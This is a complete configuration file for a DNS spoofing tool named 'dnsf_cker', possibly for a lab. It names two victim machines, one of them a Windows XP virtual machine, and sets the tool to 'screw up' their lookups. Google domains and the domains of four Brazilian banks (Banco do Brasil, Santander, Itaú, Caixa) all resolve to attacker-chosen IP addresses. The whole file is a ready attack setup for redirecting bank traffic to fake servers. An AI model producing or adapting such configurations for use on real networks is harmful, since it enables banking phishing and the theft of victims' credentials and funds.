
# dnsf_cker config.


victims =
    real-machine: 192.30.70.7
    winxp-vm: 192.30.70.8
;

to server 192.168.0.1 =
    for real-machine screw up google-names
    for winxp-vm screw up bank-names
;

google-names =
    www.google.com.br: 192.30.70.11
    www.google.com: 192.30.70.11
;

bank-names =
    www.bb.com.br: 192.30.70.12
    www.santander.com.br: 192.30.70.12
    www.itau.com.br: 192.30.70.12
    www.caixa.com.br: 192.30.70.12
;


dnsproto =
    ttl-in-secs: 3600
;
